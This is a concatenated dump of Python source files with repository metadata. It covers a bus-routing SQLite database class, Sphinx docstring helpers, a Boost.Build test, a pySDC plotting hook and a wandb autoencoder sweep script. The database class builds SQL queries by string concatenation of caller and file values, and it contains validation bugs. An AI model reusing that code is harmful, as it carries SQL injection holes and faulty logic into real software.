self.Cursor.execute(sql)
def InsertDistancesFromFile(self, DayPart, fileName):
if DayPart != "Morning" and DayPart != "Noon" and DayPart != "Morning":
raise ValueError("Error: Non valid DayPart.")
if not os.path.isfile(fileName):
print "Error: File does not exist. Returning..."
return
Table = DayPart + "Distance"
with open(fileName) as distances:
readCSV = csv.DictReader(distances, delimiter='\t')
Rows = list()
for row in readCSV:
ID1 = row["ID1"]
ID2 = row["ID2"]
Duration = row["Duration"]
if row["Distance"]:
Distance = row["Distance"]
else:
Distance = None
Rows.append([ID1, ID2, Duration, Distance])
for id1, id2, duration, distance in Rows:
# All previous distances will be overwritten
self.Cursor.execute("Delete From ?", [Table])
sql = "Insert into " + Table + " Values('" + id1 + "', '" + id2 + "', " + duration + ", " + distance + ")"
self.Cursor.execute(sql)
def Commit(self):
if self.Connection:
self.Connection.commit()
def RollBack(self):
if self.Connection:
self.Connection.rollback()
def GetAddresses(self):
self.Connect(self.FileName)
sql = " Select AddressID, GPS_X, GPS_Y, FullAddress \
From Address"
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
Addresses = dict()
for Row in Rows:
Addresses[Row["AddressID"]] = Row
return Addresses
def GetBuses(self):
self.Connect(self.FileName)
sql = " Select * From Bus"
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
Buses = dict()
for Row in Rows:
Buses[Row["BusID"]] = Row
return Buses
def GetStudents(self):
self.Connect(self.FileName)
sql = "Select * From Student"
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
Students = dict()
for Row in Rows:
Students[Row["StudentID"]] = Row
return Students
def GetSchedules(self):
self.Connect(self.FileName)
sql = "Select * From Schedule"
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
Students = dict()
for Row in Rows:
Students[Row["ScheduleID"]] = Row
return Students
# Fix this!!
def GetDistances(self, DayPart):
self.Connect(self.FileName)
if DayPart != "Morning" and DayPart != "Noon" and DayPart != "Study":
raise ValueError("Error: Non valid DayPart.")
sql = "Select * From " + DayPart + "Distance"
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
Distances = {}
for ID1, ID2, Duration, Distance in Rows:
Distances[ID1] = {}
for ID1, ID2, Duration, Distance in Rows:
Distances[ID1][ID2] = (Duration, Distance)
return Distances
def GetDepot(self, AddressID=None):
self.Connect(self.FileName)
if AddressID:
sql = "Select AddressID, GPS_X, GPS_Y, FullAddress From Depot Where AddressID = \"" + AddressID +"\""
self.Cursor.execute(sql)
else:
self.Cursor.execute("Select AddressID, GPS_X, GPS_Y, FullAddress From Depot")
Depot = self.Cursor.fetchone()
return Depot
def CalculateDistance(self, AddressID_1, AddressID_2, DayPart):
self.Connect(self.FileName)
sql = "Select Duration, Distance From " + DayPart + "Distance Where AddressID_1 = \"" + AddressID_1 + "\" and AddressID_2 = \"" + AddressID_2 + "\""
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
if Rows:
return (Rows[0]["Distance"], Rows[0]["Duration"])
else:
return []
def Execute(self, sql):
self.Cursor.execute(sql)
Rows = self.Cursor.fetchall()
return Rows
def __InitRowFactory(self):
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
self.Connection.row_factory = dict_factory
self.Cursor = self.Connection.cursor()
def __ResetRowFactory(self):
self.Disconnect()
self.Connect(self.FileName)
def __InitParser(self):
if not self._Parser:
self._Parser = util.Parser()
def __InitMapsHandler(self):
if not self._MapsHandler:
self._MapsHandler = util.MapsHandler(GoogleAPIKey=self._GoogleAPIKey, OpenAPIKey=self._OpenAPIKey)
def __DiscardAddresses(self):
self.Connect(self.FileName)
self.Cursor.execute("Select Address.AddressID \
From Address \
Where Not Exists \
(Select * From Student \
Where Student.AddressID = Address.AddressID)")
Addresses = self.Cursor.fetchall()
for Address in Addresses:
self.Cursor.execute("Delete From Address Where AddressID = ?", [Address["AddressID"]])
def __Hash(self, Address):
return sha1(Address).hexdigest()
def __LogGeocodingError(self, ID, LastName, FirstName, FormattedAddress, TranslatedAddress, DayPart, GeoFailsFile):
valid = True
if util.CountNumbers(FormattedAddress) <= 5:
if "&" not in FormattedAddress and " KAI " not in FormattedAddress:
valid = False
if GeoFailsFile:
LN = util.TranslateAddress(LastName)
FN = util.TranslateAddress(FirstName)
GeoFailsFile.write(str(ID) + "\t" + LN + "\t" + FN + "\t" + FormattedAddress + "\t"\
+ TranslatedAddress + "\t" + DayPart + "\n")
return valid
| 39.644817
| 183
| 0.471219
|
4a0a0df4944e8651a6c47f8c62dee081bb1a8126
| 2,241
|
py
|
Python
|
sphinx/util/docstrings.py
|
merwok-forks/sphinx
|
b7cada236f765003a73ab5dca48f975d54c0c298
|
[
"BSD-2-Clause"
] | null | null | null |
sphinx/util/docstrings.py
|
merwok-forks/sphinx
|
b7cada236f765003a73ab5dca48f975d54c0c298
|
[
"BSD-2-Clause"
] | null | null | null |
sphinx/util/docstrings.py
|
merwok-forks/sphinx
|
b7cada236f765003a73ab5dca48f975d54c0c298
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
sphinx.util.docstrings
~~~~~~~~~~~~~~~~~~~~~~
Utilities for docstring processing.
:copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
if False:
# For type annotation
from typing import List # NOQA
def prepare_docstring(s, ignore=1):
    # type: (unicode, int) -> List[unicode]
    """Convert a docstring into lines of parseable reST.

    Common leading indentation is stripped, where the indentation of the
    first *ignore* lines is not taken into account (those lines are simply
    left-stripped).  The result is a list of lines suitable for inserting
    into a docutils ViewList (used as argument of nested_parse()), with an
    empty line appended to separate the docstring from following content.
    """
    lines = s.expandtabs().splitlines()
    # Common margin over all non-blank lines past the ignored ones.
    indents = [len(ln) - len(ln.lstrip()) for ln in lines[ignore:] if ln.lstrip()]
    margin = min(indents) if indents else sys.maxsize
    # Ignored lines lose all of their leading whitespace.
    for i, ln in enumerate(lines[:ignore]):
        lines[i] = ln.lstrip()
    # Dedent the remaining lines by the common margin.
    if margin < sys.maxsize:
        lines[ignore:] = [ln[margin:] for ln in lines[ignore:]]
    # Drop leading blank lines.
    while lines and not lines[0]:
        del lines[0]
    # Guarantee a trailing blank line.
    if lines and lines[-1]:
        lines.append('')
    return lines
def prepare_commentdoc(s):
    # type: (unicode) -> List[unicode]
    """Extract ``#:`` documentation comment lines from *s*.

    Each stripped line beginning with ``#:`` contributes its text, minus
    the marker and one optional space right after it.  Returns an empty
    list when there is no documentation; otherwise the result ends with an
    empty separator line.
    """
    result = []
    for raw in s.expandtabs().splitlines():
        stripped = raw.strip()
        if not stripped.startswith('#:'):
            continue
        text = stripped[2:]
        # A single space directly after the marker is cosmetic -- drop it.
        if text.startswith(' '):
            text = text[1:]
        result.append(text)
    if result and result[-1]:
        result.append('')
    return result
| 32.014286
| 80
| 0.616243
|
4a0a0e061265abd4d22cf40f80b8be924b1687c6
| 2,263
|
py
|
Python
|
test/builtin_split_by_characters.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 11,356
|
2017-12-08T19:42:32.000Z
|
2022-03-31T16:55:25.000Z
|
test/builtin_split_by_characters.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 2,402
|
2017-12-08T22:31:01.000Z
|
2022-03-28T19:25:52.000Z
|
test/builtin_split_by_characters.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 1,343
|
2017-12-08T19:47:19.000Z
|
2022-03-26T11:31:36.000Z
|
#!/usr/bin/python
# Copyright 2012. Jurko Gospodnetic
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
# This tests the SPLIT_BY_CHARACTERS rule.
import BoostBuild
def test_invalid(params, expected_error_line):
    # Drive the engine with a malformed SPLIT_BY_CHARACTERS invocation and
    # expect the build to fail (status=1) emitting the given error line.
    t = BoostBuild.Tester(pass_toolset=0)
    t.write("file.jam", "SPLIT_BY_CHARACTERS %s ;" % params)
    t.run_build_system(["-ffile.jam"], status=1)
    t.expect_output_lines("[*] %s" % expected_error_line)
    t.cleanup()


def test_valid():
    # Exercise valid SPLIT_BY_CHARACTERS calls through assert.result checks in
    # a generated jamroot; the build succeeds only if every assertion holds.
    t = BoostBuild.Tester(pass_toolset=0)
    t.write("jamroot.jam", """\
import assert ;
assert.result FooBarBaz : SPLIT_BY_CHARACTERS FooBarBaz : "" ;
assert.result FooBarBaz : SPLIT_BY_CHARACTERS FooBarBaz : x ;
assert.result FooBa Baz : SPLIT_BY_CHARACTERS FooBarBaz : r ;
assert.result FooBa Baz : SPLIT_BY_CHARACTERS FooBarBaz : rr ;
assert.result FooBa Baz : SPLIT_BY_CHARACTERS FooBarBaz : rrr ;
assert.result FooB rB z : SPLIT_BY_CHARACTERS FooBarBaz : a ;
assert.result FooB B z : SPLIT_BY_CHARACTERS FooBarBaz : ar ;
assert.result ooBarBaz : SPLIT_BY_CHARACTERS FooBarBaz : F ;
assert.result FooBarBa : SPLIT_BY_CHARACTERS FooBarBaz : z ;
assert.result ooBarBa : SPLIT_BY_CHARACTERS FooBarBaz : Fz ;
assert.result F B rB z : SPLIT_BY_CHARACTERS FooBarBaz : oa ;
assert.result Alib b : SPLIT_BY_CHARACTERS Alibaba : oa ;
assert.result libaba : SPLIT_BY_CHARACTERS Alibaba : oA ;
assert.result : SPLIT_BY_CHARACTERS FooBarBaz : FooBarBaz ;
assert.result : SPLIT_BY_CHARACTERS FooBarBaz : FoBarz ;
# Questionable results - should they return an empty string or an empty list?
assert.result : SPLIT_BY_CHARACTERS "" : "" ;
assert.result : SPLIT_BY_CHARACTERS "" : x ;
assert.result : SPLIT_BY_CHARACTERS "" : r ;
assert.result : SPLIT_BY_CHARACTERS "" : rr ;
assert.result : SPLIT_BY_CHARACTERS "" : rrr ;
assert.result : SPLIT_BY_CHARACTERS "" : oa ;
""")
    t.run_build_system()
    t.cleanup()


# Error cases: missing or extra arguments must be diagnosed by the engine.
test_invalid("", "missing argument string")
test_invalid("Foo", "missing argument delimiters")
test_invalid(": Bar", "missing argument string")
test_invalid("a : b : c", "extra argument c")
test_invalid("a b : c", "extra argument b")
test_invalid("a : b c", "extra argument c")
test_valid()
| 39.017241
| 77
| 0.743261
|
4a0a0e084432a089e714af414ea79035cc046eea
| 4,374
|
py
|
Python
|
pySDC/playgrounds/Boris/penningtrap_HookClass.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 20
|
2015-03-21T09:02:55.000Z
|
2022-02-26T20:22:21.000Z
|
pySDC/playgrounds/Boris/penningtrap_HookClass.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 61
|
2015-03-02T09:35:55.000Z
|
2022-03-17T12:42:48.000Z
|
pySDC/playgrounds/Boris/penningtrap_HookClass.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 19
|
2015-02-20T11:52:33.000Z
|
2022-02-02T10:46:27.000Z
|
import matplotlib.pyplot as plt
import numpy as np
# import progressbar
from pySDC.core.Hooks import hooks
class particles_output(hooks):
    """pySDC hook that logs the total particle energy ('etot') to the stats
    and animates the particle positions on a live 3D scatter plot."""

    def __init__(self):
        """
        Initialization of particles output: set up an interactive 3D axis
        with fixed limits used to animate the particle cloud.
        """
        super(particles_output, self).__init__()

        fig = plt.figure()
        self.ax = fig.add_subplot(111, projection='3d')
        self.ax.set_xlim3d([-20, 20])
        self.ax.set_ylim3d([-20, 20])
        self.ax.set_zlim3d([-20, 20])
        plt.ion()
        self.sframe = None
        self.bar_run = None

    @staticmethod
    def _total_energy(part, params):
        """
        Return the total (kinetic + potential) energy of a particle set.

        Extracted because the identical computation was duplicated in
        pre_run and post_step.

        Args:
            part: particle container with pos/vel (3 x nparts) and q/m arrays
            params: problem parameters providing nparts, sig and omega_E

        Returns:
            float: epot + ekin
        """
        N = params.nparts
        w = np.array([1, 1, -2])

        # Compute (slowly..) the potential per particle: softened pairwise
        # Coulomb terms (omitting the self-interaction) minus the external
        # trap contribution.
        fpot = np.zeros(N)
        for i in range(N):
            for j in range(N):
                if j == i:
                    continue  # omit ith particle
                dist2 = np.linalg.norm(part.pos[:, i] - part.pos[:, j], 2) ** 2 + params.sig ** 2
                fpot[i] += part.q[j] / np.sqrt(dist2)
            fpot[i] -= params.omega_E ** 2 * part.m[i] / part.q[i] / 2.0 * \
                np.dot(w, part.pos[:, i] * part.pos[:, i])

        # Add up kinetic and potential contributions to total energy.
        epot = 0
        ekin = 0
        for n in range(N):
            epot += part.q[n] * fpot[n]
            ekin += part.m[n] / 2.0 * np.dot(part.vel[:, n], part.vel[:, n])
        return epot + ekin

    def pre_run(self, step, level_number):
        """
        Overwrite default routine called before time-loop starts; records
        the initial total energy with iter=0.

        Args:
            step: the current step
            level_number: the current level number
        """
        super(particles_output, self).pre_run(step, level_number)

        # some abbreviations
        L = step.levels[level_number]
        etot = self._total_energy(L.u[0], L.prob.params)
        self.add_to_stats(process=step.status.slot, time=L.time, level=L.level_index, iter=0,
                          sweep=L.status.sweep, type='etot', value=etot)

    def post_step(self, step, level_number):
        """
        Default routine called after each iteration; records the total energy
        at the step end point and refreshes the live scatter plot.

        Args:
            step: the current step
            level_number: the current level number
        """
        super(particles_output, self).post_step(step, level_number)

        # some abbreviations
        L = step.levels[level_number]
        L.sweep.compute_end_point()
        etot = self._total_energy(L.uend, L.prob.params)
        self.add_to_stats(process=step.status.slot, time=L.time, level=L.level_index, iter=step.status.iter,
                          sweep=L.status.sweep, type='etot', value=etot)

        # Replace the previous scatter frame with the new particle positions.
        oldcol = self.sframe
        self.sframe = self.ax.scatter(L.uend.pos[0::3], L.uend.pos[1::3], L.uend.pos[2::3])
        # Remove old line collection before drawing
        if oldcol is not None:
            self.ax.collections.remove(oldcol)
        plt.pause(0.001)

        return None
| 35.852459
| 108
| 0.536351
|
4a0a0e19abf4d64888dd0f7b3ad5d9b610f2226d
| 23,599
|
py
|
Python
|
ddganAE/wandb/train_wandb_pred_fpc.py
|
Zeff020/Adversarial_ROM
|
8c9e7ff86250e9370e5fdd2018f9ad04ded5f122
|
[
"MIT"
] | null | null | null |
ddganAE/wandb/train_wandb_pred_fpc.py
|
Zeff020/Adversarial_ROM
|
8c9e7ff86250e9370e5fdd2018f9ad04ded5f122
|
[
"MIT"
] | null | null | null |
ddganAE/wandb/train_wandb_pred_fpc.py
|
Zeff020/Adversarial_ROM
|
8c9e7ff86250e9370e5fdd2018f9ad04ded5f122
|
[
"MIT"
] | null | null | null |
"""
Functions used for weights and biases hyperparameter optimization of
predictive models on slug flow dataset.
"""
import wandb
import tensorflow as tf
import argparse
import os
import json
import keras
from sklearn.preprocessing import MinMaxScaler
from ddganAE.models import Predictive_adversarial, Predictive
from ddganAE.architectures.svdae import (
build_vinicius_encoder_decoder,
build_slimmer_vinicius_encoder_decoder,
build_smaller_vinicius_encoder_decoder,
build_dense_decoder,
build_deeper_dense_encoder,
build_dense_encoder,
build_slimmer_dense_decoder,
build_wider_dense_decoder,
build_wider_dense_encoder,
build_deeper_dense_decoder,
build_slimmer_dense_encoder,
)
from ddganAE.architectures.discriminators import (
build_custom_discriminator,
build_custom_wider_discriminator
)
import numpy as np
__author__ = "Zef Wolffs"
__credits__ = []
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "Zef Wolffs"
__email__ = "zefwolffs@gmail.com"
__status__ = "Development"
def train_wandb_pred_aae(config=None):
    """
    Construct and subsequently train the model while reporting losses to
    weights and biases platform. Weights and biases also controls
    hyperparameters.

    Builds an adversarial predictive autoencoder from the sweep config,
    trains it, evaluates prediction MSE against the training series, logs
    "prediction_mse" to wandb and optionally saves encoder/decoder.

    Args:
        config (dict, optional): Dictionary with hyperparameters, set by
            weights and biases. Defaults to None.
    """
    with wandb.init(config=config, tags=["central_doms_pred_mse"]):
        # If called by wandb.agent, as below,
        # this config will be set by Sweep Controller
        config = wandb.config

        # Data processing: reshape the flat latent array to
        # (nfiles, domains, in_vars), then move the file axis last so
        # train_data has shape (domains, in_vars, nfiles).
        latent_vars = np.load(config.datafile)
        nfiles = int(latent_vars.shape[0]/config.domains)
        latent_vars_reshaped = np.moveaxis(
            latent_vars.reshape(nfiles, config.domains, config.in_vars),
            0, 2)
        train_data = latent_vars_reshaped[:config.domains]

        # Scaling the latent variables to [-1, 1] elementwise.
        scaler = MinMaxScaler((-1, 1))
        train_data = scaler.fit_transform(
            train_data.reshape(-1, 1)).reshape(train_data.shape)

        initializer = tf.keras.initializers.RandomNormal(
            mean=0.0, stddev=0.05, seed=None
        )

        # NOTE(review): 'lr=' is the deprecated alias of 'learning_rate' in
        # tf.keras optimizers (the sgd branch already uses the new name) —
        # confirm against the pinned TF version. Also, an optimizer name
        # outside {nadam, adam, sgd} leaves `optimizer` unbound (NameError
        # below); same hazard applies to the architecture branches.
        if config.optimizer == "nadam":
            optimizer = tf.keras.optimizers.Nadam(
                lr=config.learning_rate,
                beta_1=config.momentum,
                beta_2=config.beta_2,
            )
        elif config.optimizer == "adam":
            optimizer = tf.keras.optimizers.Adam(
                lr=config.learning_rate,
                beta_1=config.momentum,
                beta_2=config.beta_2,
            )
        elif config.optimizer == "sgd":
            optimizer = tf.keras.optimizers.SGD(
                learning_rate=config.learning_rate, momentum=config.momentum
            )

        # Select encoder/decoder pair by architecture name.
        if config.architecture == "dense":
            encoder = build_dense_encoder(
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout,
            )
            decoder = build_dense_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout,
                final_act=config.final_act
            )
        elif config.architecture == "deeper_dense":
            encoder = build_deeper_dense_encoder(
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout
            )
            decoder = build_deeper_dense_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout,
                final_act=config.final_act
            )
        elif config.architecture == "wider_dense":
            encoder = build_wider_dense_encoder(
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout
            )
            decoder = build_wider_dense_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout,
                final_act=config.final_act
            )
        elif config.architecture == "slimmer_dense":
            encoder = build_slimmer_dense_encoder(
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout
            )
            decoder = build_slimmer_dense_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout,
                final_act=config.final_act
            )
        elif config.architecture == "vinicius":
            encoder, decoder = build_vinicius_encoder_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                act=config.activation,
                dense_act=config.dense_activation,
                dropout=config.dropout,
                reg=config.regularization,
                batchnorm=config.batch_normalization,
                final_act=config.final_act
            )
        elif config.architecture == "smaller_vinicius":
            encoder, decoder = build_smaller_vinicius_encoder_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                act=config.activation,
                dense_act=config.dense_activation,
                dropout=config.dropout,
                reg=config.regularization,
                batchnorm=config.batch_normalization,
                final_act=config.final_act
            )
        elif config.architecture == "slimmer_vinicius":
            encoder, decoder = build_slimmer_vinicius_encoder_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                act=config.activation,
                dense_act=config.dense_activation,
                dropout=config.dropout,
                reg=config.regularization,
                batchnorm=config.batch_normalization,
                final_act=config.final_act
            )

        # Select adversarial discriminator.
        if config.discriminator_architecture == "custom":
            discriminator = build_custom_discriminator(
                config.latent_vars, initializer, info=False
            )
        elif config.discriminator_architecture == "custom_wider":
            discriminator = build_custom_wider_discriminator(
                config.latent_vars, initializer, info=False
            )

        pred_adv = Predictive_adversarial(encoder, decoder, discriminator,
                                          optimizer)
        pred_adv.compile(config.in_vars, increment=config.increment)
        pred_adv.train(
            train_data,
            config.epochs,
            interval=config.interval,
            batch_size=config.batch_size,
            val_size=0.1,
            wandb_log=True,
            noise_std=config.noise_std,
            n_discriminator=config.n_discriminator,
            n_gradient_ascent=config.n_gradient_ascent
        )

        # Check how well the model actually performs to also predict the
        # results

        # Create boundaries and initial values arrays for prediction later.
        # Domains 0 and 3 act as boundaries; domains 1 and 2 supply the
        # initial states (first snapshot).
        boundaries = np.zeros((2, config.in_vars, nfiles))
        boundaries[0] = train_data[0]
        boundaries[1] = train_data[3]
        init_values = np.zeros((2, config.in_vars))
        init_values[0] = train_data[1][:, 0]
        init_values[1] = train_data[2][:, 0]

        predicted = pred_adv.predict(boundaries, init_values,
                                     int(nfiles/config.interval)-1, iters=3)

        # Compare predictions against the subsampled training series.
        train_data_int = train_data[:, :, ::config.interval]

        mse = tf.keras.losses.MeanSquaredError()
        mse_pred = mse(predicted[:, :, :int(nfiles/config.interval)-2],
                       train_data_int[:, :, :int(nfiles/config.interval)-2])\
            .numpy()

        log = {"prediction_mse": mse_pred}
        wandb.log(log)

        if config.savemodel:
            dirname = "model_" + wandb.run.name
            os.mkdir(dirname)
            pred_adv.encoder.save(dirname + '/encoder')
            pred_adv.decoder.save(dirname + '/decoder')
def train_wandb_pred_ae(config=None):
    """
    Construct and subsequently train the model while reporting losses to
    weights and biases platform. Weights and biases also controls
    hyperparameters.

    Non-adversarial counterpart of train_wandb_pred_aae: builds a plain
    predictive autoencoder, trains it, logs "prediction_mse" to wandb and
    optionally saves encoder/decoder.

    Args:
        config (dict, optional): Dictionary with hyperparameters, set by
            weights and biases. Defaults to None.
    """
    with wandb.init(config=config, tags=["central_doms_pred_mse"]):
        # If called by wandb.agent, as below,
        # this config will be set by Sweep Controller
        config = wandb.config

        # Data processing: reshape flat latents to (nfiles, domains, in_vars)
        # then move the file axis last -> train_data: (domains, in_vars, nfiles).
        latent_vars = np.load(config.datafile)
        nfiles = int(latent_vars.shape[0]/config.domains)
        latent_vars_reshaped = np.moveaxis(
            latent_vars.reshape(nfiles, config.domains, config.in_vars),
            0, 2)
        train_data = latent_vars_reshaped[:config.domains]

        # Scaling the latent variables to [-1, 1] elementwise.
        scaler = MinMaxScaler((-1, 1))
        train_data = scaler.fit_transform(
            train_data.reshape(-1, 1)).reshape(train_data.shape)

        initializer = tf.keras.initializers.RandomNormal(
            mean=0.0, stddev=0.05, seed=None
        )

        # NOTE(review): 'lr=' is the deprecated alias of 'learning_rate'
        # (sgd branch uses the new name); an unknown optimizer/architecture
        # name leaves `optimizer`/`encoder` unbound.
        if config.optimizer == "nadam":
            optimizer = tf.keras.optimizers.Nadam(
                lr=config.learning_rate,
                beta_1=config.momentum,
                beta_2=config.beta_2,
            )
        elif config.optimizer == "adam":
            optimizer = tf.keras.optimizers.Adam(
                lr=config.learning_rate,
                beta_1=config.momentum,
                beta_2=config.beta_2,
            )
        elif config.optimizer == "sgd":
            optimizer = tf.keras.optimizers.SGD(
                learning_rate=config.learning_rate, momentum=config.momentum
            )

        # Select encoder/decoder pair by architecture name.
        if config.architecture == "dense":
            encoder = build_dense_encoder(
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout,
            )
            decoder = build_dense_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout,
                final_act=config.final_act
            )
        elif config.architecture == "deeper_dense":
            encoder = build_deeper_dense_encoder(
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout
            )
            decoder = build_deeper_dense_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout,
                final_act=config.final_act
            )
        elif config.architecture == "wider_dense":
            encoder = build_wider_dense_encoder(
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout
            )
            decoder = build_wider_dense_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout,
                final_act=config.final_act
            )
        elif config.architecture == "slimmer_dense":
            encoder = build_slimmer_dense_encoder(
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout
            )
            decoder = build_slimmer_dense_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                info=False,
                act=config.activation,
                dropout=config.dropout,
                final_act=config.final_act
            )
        elif config.architecture == "vinicius":
            encoder, decoder = build_vinicius_encoder_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                act=config.activation,
                dense_act=config.dense_activation,
                dropout=config.dropout,
                reg=config.regularization,
                batchnorm=config.batch_normalization,
                final_act=config.final_act
            )
        elif config.architecture == "smaller_vinicius":
            encoder, decoder = build_smaller_vinicius_encoder_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                act=config.activation,
                dense_act=config.dense_activation,
                dropout=config.dropout,
                reg=config.regularization,
                batchnorm=config.batch_normalization,
                final_act=config.final_act
            )
        elif config.architecture == "slimmer_vinicius":
            encoder, decoder = build_slimmer_vinicius_encoder_decoder(
                config.in_vars,
                config.latent_vars,
                initializer,
                act=config.activation,
                dense_act=config.dense_activation,
                dropout=config.dropout,
                reg=config.regularization,
                batchnorm=config.batch_normalization,
                final_act=config.final_act
            )

        pred_adv = Predictive(encoder, decoder,
                              optimizer)
        pred_adv.compile(config.in_vars, increment=config.increment)
        pred_adv.train(
            train_data,
            config.epochs,
            interval=config.interval,
            batch_size=config.batch_size,
            val_size=0.1,
            wandb_log=True,
            noise_std=config.noise_std
        )

        # Check how well the model actually performs to also predict the
        # results

        # Create boundaries and initial values arrays for prediction later.
        # Domains 0 and 3 act as boundaries; domains 1 and 2 supply the
        # initial states (first snapshot).
        boundaries = np.zeros((2, config.in_vars, nfiles))
        boundaries[0] = train_data[0]
        boundaries[1] = train_data[3]
        init_values = np.zeros((2, config.in_vars))
        init_values[0] = train_data[1][:, 0]
        init_values[1] = train_data[2][:, 0]

        predicted = pred_adv.predict(boundaries, init_values,
                                     int(nfiles/config.interval)-1, iters=3)

        # Compare predictions against the subsampled training series.
        train_data_int = train_data[:, :, ::config.interval]

        mse = tf.keras.losses.MeanSquaredError()
        mse_pred = mse(predicted[:, :, :int(nfiles/config.interval)-2],
                       train_data_int[:, :, :int(nfiles/config.interval)-2])\
            .numpy()

        log = {"prediction_mse": mse_pred}
        wandb.log(log)

        if config.savemodel:
            dirname = "model_" + wandb.run.name
            os.mkdir(dirname)
            pred_adv.encoder.save(dirname + '/encoder')
            pred_adv.decoder.save(dirname + '/decoder')
# Configuration options for hyperparameter optimization
# wandb sweep specification for the adversarial predictive model: random
# search minimizing the "prediction_mse" metric logged by
# train_wandb_pred_aae.
Predictive_adversarial_sweep_config = {
    "method": "random",
    "metric": {"name": "prediction_mse", "goal": "minimize"},
    "parameters": {
        # Encoder/decoder architecture names understood by the builders above.
        "architecture": {
            "values": [
                "dense",
                "deeper_dense",
                "wider_dense",
                "slimmer_dense",
                "vinicius",
                "smaller_vinicius",
                "slimmer_vinicius",
            ]
        },
        "activation": {"values": ["relu", "elu", "sigmoid", "tanh"]},
        "discriminator_architecture": {"values": ["custom", "custom_wider"]},
        "in_vars": {"values": [10]},
        "dense_activation": {"values": ["relu", "linear"]},
        "batch_size": {"values": [32, 64, 128]},
        "learning_rate": {"values": [5e-3, 5e-4, 5e-5]},
        "dropout": {"values": [0.3, 0.55, 0.8]},
        "optimizer": {"values": ["nadam", "adam", "sgd"]},
        "momentum": {"values": [0.8, 0.9, 0.98]},
        "beta_2": {"values": [0.9, 0.999, 0.99999]},
        "batch_normalization": {"values": [True, False]},
        "regularization": {"values": [1e-3, 1e-4, 1e-5, 1e-6, 0]},
        "savemodel": {"values": [False]},
        "latent_vars": {"values": [30, 60, 100, 300]},
        "interval": {"values": [1, 2, 4, 6]},
        "final_act": {
            "values": [
                "linear",
                "sigmoid",
                "tanh"
            ]
        },
        "noise_std": {"values": [0.00001, 0.001, 0.01, 0.05, 0.1]},
        "increment": {"values": [True, False]},
        "epochs": {"values": [100, 200, 500, 1000]},
        # Adversarial-training-only knobs.
        "n_discriminator": {"values": [1, 2, 4, 5]},
        "n_gradient_ascent": {"values": [3, 8, 15, 30]},
        "domains": {"values": [4]}
    },
}

# Configuration options for hyperparameter optimization
# Same sweep for the plain (non-adversarial) predictive autoencoder; identical
# to the adversarial config minus the discriminator/adversarial parameters.
Predictive_ae_sweep_config = {
    "method": "random",
    "metric": {"name": "prediction_mse", "goal": "minimize"},
    "parameters": {
        "architecture": {
            "values": [
                "dense",
                "deeper_dense",
                "wider_dense",
                "slimmer_dense",
                "vinicius",
                "smaller_vinicius",
                "slimmer_vinicius",
            ]
        },
        "activation": {"values": ["relu", "elu", "sigmoid", "tanh"]},
        "in_vars": {"values": [10]},
        "dense_activation": {"values": ["relu", "linear"]},
        "batch_size": {"values": [32, 64, 128]},
        "learning_rate": {"values": [5e-3, 5e-4, 5e-5]},
        "dropout": {"values": [0.3, 0.55, 0.8]},
        "optimizer": {"values": ["nadam", "adam", "sgd"]},
        "momentum": {"values": [0.8, 0.9, 0.98]},
        "beta_2": {"values": [0.9, 0.999, 0.99999]},
        "batch_normalization": {"values": [True, False]},
        "regularization": {"values": [1e-3, 1e-4, 1e-5, 1e-6, 0]},
        "savemodel": {"values": [False]},
        "latent_vars": {"values": [30, 60, 100, 300]},
        "interval": {"values": [1, 2, 4, 6]},
        "final_act": {
            "values": [
                "linear",
                "sigmoid",
                "tanh"
            ]
        },
